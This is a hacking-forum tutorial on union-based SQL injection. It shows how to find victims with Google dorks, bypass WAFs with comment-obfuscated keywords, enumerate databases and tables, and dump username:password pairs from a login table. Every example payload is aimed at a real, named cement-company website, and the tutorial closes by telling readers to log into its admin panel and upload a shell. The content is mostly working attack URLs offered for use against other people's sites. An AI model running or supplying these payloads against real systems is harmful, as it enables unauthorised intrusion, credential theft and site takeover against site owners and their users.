In the last article we saw how to create databases, tables and columns and how to add records to them in different ways. In this article we will cover SQL injection: what it is and how a website can be attacked through it.

Please rep+ if you like it; it took me an hour to complete.
What is SQL injection?

SQL injection is one of the most common ways websites get hacked today. It happens when user input (a URL parameter, a form field, a cookie) is pasted straight into an SQL query, so the attacker can change the query the server runs.
Newbies think it is no big deal because they can exploit it with tools like sqlmap, Havij, sqlninja and other kiddie scripts, but SQL injection is a big enough subject to fill several books.

So what can you do with SQL injection?
You can read records
You can modify records
You can bypass login areas
You can compromise the database server itself

Okay, here our first step begins.

Finding vulnerable websites

If you are a hacker you must know that search engines are your best friends. We can find candidate websites using Google dorks. Common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

etc. There is a huge list of dorks. A dork only finds pages that take a numeric parameter; whether the site is actually vulnerable is decided by the test in the next step.

Now if you search any of these you will find many websites. Open any of them and you will see a URL like

Code:
website.com/index.php?id=1
(the script name and parameter will vary). To test whether the site is vulnerable, put a ' at the end of the URL so that it looks like

Code:
website.com/index.php?id=1'

The quote breaks the SQL syntax if the parameter is placed into the query unescaped. If you see an error like

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any other MySQL error, the parameter reaches the query unescaped and the site is vulnerable. If there is no error message but part of the page content disappears, the query probably failed silently; that is also a sign of injection (a blind one, since there is no error text to read), but it is a weaker signal than an error, so confirm it with the ORDER BY test below. A generic "something went wrong" page proves nothing by itself.

example

[Image: lgtf2af.png]

You can see it is a MySQL error, so the website is vulnerable.

So now let's move to the next step.

Exploiting the vulnerability

Now that we have found a vulnerable website, it is time to fetch the secret data.

Our next step is to find the number of columns returned by the query behind the page. We need this because the UNION SELECT we add later must return exactly the same number of columns as the original query, otherwise MySQL rejects it.

For that we replace the ' with an ORDER BY clause. ORDER BY n sorts the result by its nth column, so it works as long as n is not larger than the number of columns:

Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

We increase the ORDER BY number until we get an error like
Unknown column '21' in 'order clause'
(the number being the first one that is too big) or until some content goes missing from the page.

example
Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE

So we got an error at ORDER BY 21 but no error at ORDER BY 20, which means the query returns 20 columns.

Sometimes this does not work at all and we get no error even at ORDER BY 1000. That usually means the parameter is placed inside quotes in the query (id='20'), so our ORDER BY just becomes part of a string. In that case we put a ' after the parameter value to close the quote and end the injection with --+ :

Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error

The + becomes a space when the URL is decoded. MySQL only treats -- as a comment when it is followed by whitespace, so without the + the rest of the original query would not be commented out.

Now the next step begins.

Union Select

Now we know the query has 20 columns, so we append our own SELECT with 20 columns using UNION SELECT. The SELECT statement is used to read data; if you want to learn more about SQL, check my article on working with SQL.

Okay, for now we use a statement like

Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Now you should see some of the numbers on the page, like 1, 5 or 7. If you do not, put a - before the parameter value so that the original query matches no row (there is no page with id -20) and the only row left to display is the one from our UNION SELECT:

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

You can see the result in the picture below.

You can see 3 and 4 on the web page. These are the columns the page prints, so these are the positions where we can make our data appear.

Sometimes UNION SELECT does not work because of a WAF (web application firewall). Then we hide the keywords in comments or change their case, for example

/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3--

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--

or change case

/*!UnIOn*//*!SeLect*/+1,2,3--

etc. The /*!...*/ form is MySQL's versioned comment: MySQL executes what is inside it, while a WAF that strips comments sees nothing. The forms that split a keyword with a plain comment only work when the WAF and the database tokenise the input differently, so test each variant against the target rather than assuming it works.



[Image: oksohyM.png]


Now it is time to retrieve data in those columns.

We can retrieve sensitive data by calling functions in the reflected columns: database() for the current database name, version() or @@version for the server version, user() for the database user, concat() and group_concat() to pack several values into one column, LOAD_FILE() to read files from the server (if the database user has the FILE privilege), and many more.

For the tutorial I will call version() in column 3 and put the database and user info in column 4 using group_concat(). For that I use

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

I used 0x3a because it is the hex value of a colon (:). MySQL treats the 0x literal as a string here, so it separates the two values without needing a quoted ':' that could get escaped by the application.

Now you can see in the image that columns 3 and 4 are replaced with the values I called.

[Image: mYXScSV.png]

Okay, next thing:

How do we find all the databases on the server?

That is easy. We replace one of the reflected columns with a query on information_schema, which holds the names of all databases the current database user can see:

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--


see

[Image: lgt73e3.png]

Now we know there are basically two databases,
information_schema and cementco_cement.
Ignore information_schema: it holds the system tables that describe the databases, tables and columns on the server. We use it to look at the layout of the other database, not as a target.

Okay, now we have our database. We do not actually need its name: when dumping from the current database we can use the database() function instead of the literal cementco_cement. The literal name is only needed when we dump from a database other than the current one, and in this case we are simply dumping from the current one.

Now let's find the tables in the current database.

We will use a WHERE condition in this query: we fetch the table names from information_schema.tables and use WHERE table_schema=database() to get only the tables that belong to our database.

Syntax:

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

[Image: lgt97a9.png]

Now you can see we have all the table names, which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

(group_concat output is cut off at 1024 characters by default, so if the list looks truncated, drop group_concat and page through the names with limit 0,1 , limit 1,1 and so on instead.)

Now we are going to dump the sensitive table, which is login.

Okay, let's dump it.

We replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns, and in the WHERE condition we change table_schema to table_name and set it to the name of the table in quotes, like
table_name='login'
Why the quotes? Because the column is a varchar, so the value is a string.
Sometimes the quoted form does not work, because the application escapes quotes (addslashes / magic_quotes) before the value reaches the query. Then we write the string without quotes as MySQL CHAR() values (or as a hex literal, 0x6c6f67696e); for that I use HackBar.

The MySQL CHAR value of login is CHAR(108, 111, 103, 105, 110), so now our query looks like

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

Note that table_name alone matches a table called login in any database on the server; if you get columns you do not expect, add and table_schema=database() to the WHERE condition.

Yeah, now we can see the columns of table 'login', which are id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

Okay, now the fun begins: time to dump the columns.
For example, to dump the username and password columns from table 'login' we replace the information_schema part of the query with

select group_concat(username,0x3a,password) from login--

Syntax:
Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
[Image: sE3M29s.png]

You can see username:password pairs on the web page (if the password column holds hashes rather than plain text, they still have to be cracked).

Now just find the admin panel, log in and upload the shell.

Was it easy? Yeah, but sometimes a WAF can mess with your head.

Now, dealing with error-based SQL injections:

I have already posted that tutorial here

http://www.madleets.com/Thread-double-qu...tion-video
